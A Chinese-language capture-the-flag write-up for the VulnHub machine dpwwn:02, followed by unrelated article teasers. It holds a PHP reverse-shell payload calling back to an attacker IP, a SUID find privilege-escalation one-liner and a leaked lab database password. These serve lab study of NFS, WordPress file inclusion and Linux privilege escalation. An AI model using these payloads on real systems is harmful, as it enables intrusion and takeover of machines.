dpwwn:02

靶场下载地址

https://download.vulnhub.com/dpwwn/dpwwn-02.zip

环境配置

当打开此虚拟机环境的时候,可能会出现:当前硬件版本不支持设备“sata”。然后启动失败的情况~ 解决办法参考:https://www.cnblogs.com/yaodun55/p/16434468.html

此靶场环境为静态IP地址10.10.10.10,因此需要更改攻击机IP地址为10.10.10.0/24网段~

攻击机IP地址:

配置了两个网卡,一个是NAT,一个是仅主机;

信息收集

# nmap -sn 10.10.10.0/24 -oN live.nmap            
Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-15 09:29 CST
Nmap scan report for 10.10.10.1
Host is up (0.00020s latency).
MAC Address: 00:50:56:C0:00:13 (VMware)
Nmap scan report for 10.10.10.10
Host is up (0.00023s latency).
MAC Address: 00:0C:29:FB:00:9F (VMware)
Nmap scan report for 10.10.10.254
Host is up (0.00023s latency).
MAC Address: 00:50:56:FF:B3:34 (VMware)
Nmap scan report for 10.10.10.11
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.06 seconds 

判断靶机的地址为10.10.10.10;

# nmap -sT --min-rate 10000 -p- 10.10.10.10 -oN port.nmap      
Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-15 09:36 CST
Nmap scan report for 10.10.10.10
Host is up (0.0018s latency).
Not shown: 65527 closed tcp ports (conn-refused)
PORT      STATE SERVICE
80/tcp    open  http
111/tcp   open  rpcbind
443/tcp   open  https
2049/tcp  open  nfs
33187/tcp open  unknown
39137/tcp open  unknown
42939/tcp open  unknown
46841/tcp open  unknown
MAC Address: 00:0C:29:FB:00:9F (VMware)

端口开放情况,开放的端口比较多,80对应http 111端口是远程过程调用 443 https 2049对应nfs 后面的端口暂时不知道具体是什么服务;

# nmap -sT -sC -sV -O -p80,111,443,2049,33187,39137,42939,46841 10.10.10.10 -oN details.nmap 
Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-15 09:36 CST
Nmap scan report for 10.10.10.10
Host is up (0.00056s latency).PORT      STATE SERVICE  VERSION
80/tcp    open  http     Apache httpd 2.4.38 ((Ubuntu))
|_http-title: dpwwn-02
|_http-server-header: Apache/2.4.38 (Ubuntu)
111/tcp   open  rpcbind  2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100003  3           2049/udp   nfs
|   100003  3           2049/udp6  nfs
|   100003  3,4         2049/tcp   nfs
|   100003  3,4         2049/tcp6  nfs
|   100005  1,2,3      33187/tcp   mountd
|   100005  1,2,3      45827/tcp6  mountd
|   100005  1,2,3      48521/udp6  mountd
|   100005  1,2,3      48823/udp   mountd
|   100021  1,3,4      33481/udp6  nlockmgr
|   100021  1,3,4      34391/tcp6  nlockmgr
|   100021  1,3,4      45888/udp   nlockmgr
|   100021  1,3,4      46841/tcp   nlockmgr
|   100227  3           2049/tcp   nfs_acl
|   100227  3           2049/tcp6  nfs_acl
|   100227  3           2049/udp   nfs_acl
|_  100227  3           2049/udp6  nfs_acl
443/tcp   open  http     Apache httpd 2.4.38 ((Ubuntu))
|_http-server-header: Apache/2.4.38 (Ubuntu)
|_http-title: dpwwn-02
2049/tcp  open  nfs      3-4 (RPC #100003)
33187/tcp open  mountd   1-3 (RPC #100005)
39137/tcp open  mountd   1-3 (RPC #100005)
42939/tcp open  mountd   1-3 (RPC #100005)
46841/tcp open  nlockmgr 1-4 (RPC #100021)
MAC Address: 00:0C:29:FB:00:9F (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop

服务的详细信息探测:80端口上是Apache2.4.38 443端口是https看起来和80端口上没什么区别,其他的端口是rpc的相关服务!

# nmap -sU --min-rate 10000 -p- 10.10.10.10 -oN udp.nmap
Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-15 09:37 CST
Warning: 10.10.10.10 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.10.10
Host is up (0.0010s latency).
Not shown: 65451 open|filtered udp ports (no-response), 78 closed udp ports (port-unreach)
PORT      STATE SERVICE
111/udp   open  rpcbind
2049/udp  open  nfs
45888/udp open  unknown
47146/udp open  unknown
48823/udp open  unknown
57250/udp open  unknown
MAC Address: 00:0C:29:FB:00:9F (VMware)Nmap done: 1 IP address (1 host up) scanned in 72.86 seconds

UDP端口的探测,结果显示如上端口开放,其中还是存在着RPC的相关服务,例如2049端口的NFS;由于之前测试过NFS的相关漏洞;因此这里选择渗透的优先级是 2049端口 之后如果没什么突破,就在80端口上寻找突破点~

渗透测试

利用showmount命令 参数-e 显示指定的NFS服务器中已被客户端连接的所有输出目录 :

showmount -e 10.10.10.10

发现了一个共享目录,利用mount命令挂载到我们的本地!

mkdir dpwwn2
mount -f nfs 10.10.10.10:/home/dpwwn02 ./dpwwn2

手动挂载完成之后,cd到dpwwn2目录下,什么都没有发现? 确认了一下自己的操作;没什么问题;转到80端口和443端口上进行突破!

80端口上暴漏出来的信息,显示的信息,实在告诉我们dpwwn02的目标是非常简单的,获取一个像root的shell~

源码中也没什么信息;尝试进行目录扫描:

目录扫描的结果可以看到,存在wordpress~ 尝试进行访问看:

没错确实是wordpress!那接下来就利用wpscan进行扫描:

点击“hello mate”之后,可以看到存在一个用户为admin! 利用wpscan发现确实存在一个用户为admin:

尝试对admin账号进行密码的枚举,发现失败了~

最后添加api token进行 插件等相关枚举:

发现了本地文件包含漏洞!

poc如上,利用curl进行请求:

成功访问到/etc/passwd文件!由于之前我们看到了NFS服务,我们可以在dpwwn的家目录下面写文件,然后包含?

<?php exec('/bin/bash -c "bash -i >& /dev/tcp/10.10.10.11/4444 0>&1"');?>

然后利用LFI漏洞进行包含,同时起监听:

成功收到会话~ 权限是www-data权限~

提权

查看wp-config.php文件内容:

看到了数据库的账号和密码信息:

dpwwn02
wpuser
wp$%bd(*&u$)rJmKa

想去看看mysql数据库中是不是存储着其他的用户信息,但是登录之后执行不了命令,一直卡住不知道具体原因是什么?

查看定时任务:

存在定时任务,但是 user并不是root 而是www-data,便没有办法去提权了~ 查找suid权限的文件:

find命令! 直接利用find命令进行提权了~ 利用find | GTFOBins

find . -exec /bin/sh -p \; -quit

读取root目录下面的flag文件!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/636045.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

x-cmd pkg | fanyi - 命令行中英文翻译工具

目录 简介首次用户功能特点竞品和相关作品进一步探索 简介 fanyi 是命令行翻译工具&#xff0c;翻译数据来源于 icba.com 和 fanyi.youdao.com&#xff0c;仅支持中英文互译。支持 ChatGPT&#xff0c;可通过设置 OpenAI API 密钥以启用 ChatGPT 翻译。 注意&#xff1a;在 L…

QT上位机开发(动态数据采集与监控)

【 声明:版权所有,欢迎转载,请勿用于商业用途。 联系信箱:feixiaoxing @163.com】 上位机开发中,有一种类型的应用软件很特殊,它几乎没有什么交互操作,主要的工作就是检测和显示。如果说在此基础上有什么扩展的话,可能就是安全监控和报警。所以,这个上位机软件…

Flink SQL

Flink SQL 来源&#xff1a;B站尚硅谷 sql-client准备 Table API和SQL是最上层的API&#xff0c;在Flink中这两种API被集成在一起&#xff0c;SQL执行的对象也是Flink中的表&#xff08;Table&#xff09;&#xff0c;所以我们一般会认为它们是一体的。Flink是批流统一的处理…

银河麒麟V10安装mysql5.7

本文介绍如何在银河麒麟高级服务器操作系统下安装 Mysql 数据库 1.适配系统版本 适用系统&#xff1a;V10(SP1) 适用架构&#xff1a;X86、AARCH64、LOONGARCH64 其他版本和架构可作参考 2.安装说明 X86 和 AARCH 架构的源中自带 Mysql 安装包&#xff0c;所以可以下载对…

本地运行LlaMA 2的简易指南

大家好&#xff0c;像LLaMA 2这样的新开源模型已经变得相当先进&#xff0c;并且可以免费使用。可以在商业上使用它们&#xff0c;也可以根据自己的数据进行微调&#xff0c;以开发专业版本。凭借其易用性&#xff0c;现在可以在自己的设备上本地运行它们。 本文将介绍如何下载…

@RequestBody注解基础

RequestBody RequestBody注解一般与post方法使用。 一个请求中只能存在一个RequestBody注解。 RequestBody 用于接收前端传递给后端的json字符串中的数据。&#xff08;处理json格式的数据&#xff09; 语法格式&#xff1a; ​(RequestBody Map map) (RequestBody Object obje…

numpy数组的max、min、argmax和argmin计算方法

numpy数组的max、min、argmax和argmin计算方法 官方对numpy.max和numpy.min的说明 numpy.max 参考官方的理解 数组&#xff1a; 24611529 import numpy as npif __name__ __main__:a np.array([[2, 4, 6, 1], [1, 5, 2, 9]])print(a)print(np.argmax(a, axis0)) # ax…

Java医院信息管理系统

技术框架&#xff1a; springboot shiro layui jquery thymeleaf nginx 有需要的可以联系我。 运行环境&#xff1a; jdk8 mysql IntelliJ IDEA maven项目功能&#xff1a; 本项目是用springbootlayuishiro写的医院管理系统&#xff0c;系统的业务比较复杂&#x…

11 - PXC集群|MySQL存储引擎

PXC集群&#xff5c;MySQL存储引擎 数据库系列文章PXC集群配置集群测试集群 MySQL存储引擎存储引擎介绍mysql服务体系结构mysql服务的工作过程处理查询访问的工作过程处理存储insert访问的工作过程 什么是搜索引擎 存储引擎管理查看存储引擎修改存储引擎 存储引擎特点myisam存储…

canvas能压缩图片?

之前写过一篇使用命令行工具压缩图片的博文&#xff1a;使用yx-tiny命令行工具进行图片压缩&#xff0c;大家感兴趣可以去瞅一眼。 这篇简单说一下使用canvas压缩图片 其实思路很简单&#xff0c;我们选择了图片之后&#xff0c;会获取到对应的文件流对象&#xff0c;然后我们…

jvm复习,深入理解java虚拟机一:运行时数据区域

程序计数器&#xff08;Program Counter Register&#xff09; 它是程序控制流的指示器&#xff0c;简单来说&#xff0c;为了线程切换后能恢复到正确的执行位置&#xff0c;每条线程都需要有一个独立的程序计数器 Java虚拟机栈&#xff08;Java Virtual Machine Stack&#xf…

【LeetCode每日一题】2809. 使数组和小于等于 x 的最少时间

2024-1-19 文章目录 [2809. 使数组和小于等于 x 的最少时间](https://leetcode.cn/problems/minimum-time-to-make-array-sum-at-most-x/)思路&#xff1a; 2809. 使数组和小于等于 x 的最少时间 思路&#xff1a; 获取两个列表的长度n&#xff0c;并初始化一个二维数组f&…

一种更快的Kmeans原理与实现

普通的k-means实现大多需要多轮迭代,一轮需要O(n * k)的复杂度,其中n是数据量,k是聚类的数量。观察到大部分地方的标准均值中的大多数距离计算都是冗余的。 所以Elkan-Kmeans通过三角不等式来优化这一过程,减少无效计算。 困难在于三角不等式给出了上界,但我们需要下界以…

《微信小程序开发从入门到实战》学习八十六

6.15 设备API 6.15.5 屏幕亮度API 使用wx.setScreenBrightness可设置屏幕亮度。示例代码如下&#xff1a; wx.setScreenBrightness({ value: 0.5, // 屏幕亮度值&#xff0c;范围0~1,1表示最亮 success() {} }) 使用wx.getScreenBrightness可获取屏幕亮度&#xff0c;示例代…

我在提交代码的时候突然发现别人刚才提交了一点代码,我没有拉取导致问题,请问怎么解决

问: 回答: 问: 我跟随输入git pull ,然后又以下提示: Merge branch systemPower_dev of https://xxxx.com into xxxx_dev # Please enter a commit message to explain why this merge is necessary, # especially if it merges an updated upstream into a topic branch. …

C# 十大排序算法

以下是常见的十大排序算法&#xff08;按照学习和实现的顺序排列&#xff09;&#xff1a; 冒泡排序&#xff08;Bubble Sort&#xff09;选择排序&#xff08;Selection Sort&#xff09;插入排序&#xff08;Insertion Sort&#xff09;希尔排序&#xff08;Shell Sort&…

LLM设计原理学习笔记

1 设计原则 &#xff08;1&#xff09;不要将多模态特征直接线性相加 博文《马毅LeCun谢赛宁曝出多模态LLM重大缺陷&#xff01;开创性研究显著增强视觉理解能力》描述了多模态encoding线性相加带来的问题&#xff1b;

推荐几种常用Web前端开发工具

工欲善其事&#xff0c;必先利其器。一个好的编辑器&#xff0c;往往能帮助开发人员提高编码效率。下面为大家推荐几款前端常用的编辑器。 1.websorm WebStorm 是jetbrains公司旗下一款JavaScript 开发工具。目前已经被广大中国JS开发者誉为“Web前端开发神器”、“最强大的H…

【VTKExamples::PolyData】第九期 ExtractCellsUsingPoints

很高兴在雪易的CSDN遇见你 VTK技术爱好者 QQ:870202403 前言 本文分享VTK样例ExtractCellsUsingPoints,并解析vtkSelectionNode接口,希望对各位小伙伴有所帮助! 感谢各位小伙伴的点赞+关注,小易会继续努力分享,一起进步! 你的点赞就是我的动力(^U^)ノ~YO 目录…

SELF自动化指令集构建代码实现

SELF-Instruct paper: 2022.12, SELF-INSTRUCT: Aligning Language Model with Self Generated Instructions https://github.com/yizhongw/self-instruct https://github.com/tatsu-lab/stanford_alpaca#data-generation-process 一语道破天机&#xff1a;类似非线性插值&a…